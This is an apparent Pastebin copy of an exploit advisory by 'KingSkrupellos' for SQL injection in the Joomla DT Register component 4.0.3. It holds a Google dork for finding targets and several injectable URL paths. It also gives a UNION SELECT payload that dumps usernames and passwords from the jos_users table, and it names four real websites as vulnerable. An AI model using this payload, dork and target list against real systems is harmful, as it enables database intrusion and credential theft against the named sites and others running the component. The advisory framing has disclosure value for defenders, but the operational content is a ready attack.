KingSkrupellos

Joomla DT Register Components 4.0.3 SQL Injection

Feb 13th, 2019
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.01 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla DT Register Components 4.0.3 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/02/2019
  7. # Vendor Homepage : dthdevelopment.com
  8. # Software Download Link : joomlart.com/member/downloads/dthdevelopment/dt-register/dt-register-component
  9. github.com/reeleis/ohiocitycycles/tree/master/components/com_dtregister
  10. # Software Information Link : extensions.joomla.org/extension/dt-register/
  11. # Software Version : 4.0.3 and previous versions.
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_dtregister''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. DT Register is the most powerful Joomla extension for event registration.
  27.  
  28. The Joomla event booking extension provides all needed features to successfully
  29.  
  30. promote, book, manage and monetize any types of events your
  31.  
  32. organization may offer to your customers.
  33.  
  34. ####################################################################
  35.  
  36. # Impact :
  37. ***********
  38. Joomla DT Register 4.0.3 and other versions -
  39.  
  40. component for Joomla is prone to an SQL-injection vulnerability because it
  41.  
  42. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  43.  
  44. Exploiting this issue could allow an attacker to compromise the application,
  45.  
  46. access or modify data, or exploit latent vulnerabilities in the underlying database.
  47.  
  48. A remote attacker can send a specially crafted request to the vulnerable application
  49.  
  50. and execute arbitrary SQL commands in application`s database.
  51.  
  52. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  53.  
  54. An attacker can exploit this issue using a browser.
  55.  
  56. ####################################################################
  57.  
  58. # SQL Injection Exploit :
  59. **********************
  60. /index.php?option=com_dtregister=[SQL Injection]
  61.  
  62. /index.php?option=com_dtregister&Itemid=[SQL Injection]
  63.  
  64. /index.php?option=com_dtregister&eventId=[SQL Injection]
  65.  
  66. /index.php?option=com_dtregister&controller=event&task=terms&format=raw&eventId=[SQL Injection]
  67.  
  68. /index.php/component/dtregister/?eventId=[ID-NUMBER]&task=registrant&controller=event&Itemid=[SQL Injection]
  69.  
  70. /index.php?option=com_dtregister&view=event&layout=list&controller=event&task=events&Itemid=[SQL Injection]
  71.  
  72. /index.php?option=com_dtregister&controller=location&task=show&id=[ID-NUMBER]&tmpl=component&Itemid=[SQL Injection]
  73.  
  74. # Example SQL Injection Exploit Payload :
  75. **************************************
  76.  
  77. /index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
  78.  
  79. ####################################################################
  80.  
  81. # Example Vulnerable Sites :
  82. *************************
  83. [+] diabloactionpistol.com/joomla/index.php?option=com_dtregister
  84. &view=event&layout=list&controller=event&task=events&Itemid=588
  85.  
  86. [+] vbcrockmart.com/index.php?option=com_dtregister=1709
  87.  
  88. [+] centralmasafety.org/register/index.php?option=com_dtregister
  89. &controller=location&task=show&id=4&tmpl=component&Itemid=20
  90.  
  91. [+] sdhs.org/index.php?option=com_dtregister&Itemid=64
  92.  
  93. ####################################################################
  94.  
  95. # Example SQL Database Error :
  96. ****************************
  97. jos-Warning: Error loading component: com_dtregister1709
  98.  
  99. ####################################################################
  100.  
  101. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  102.  
  103. ####################################################################
Add Comment
Please, Sign In to add comment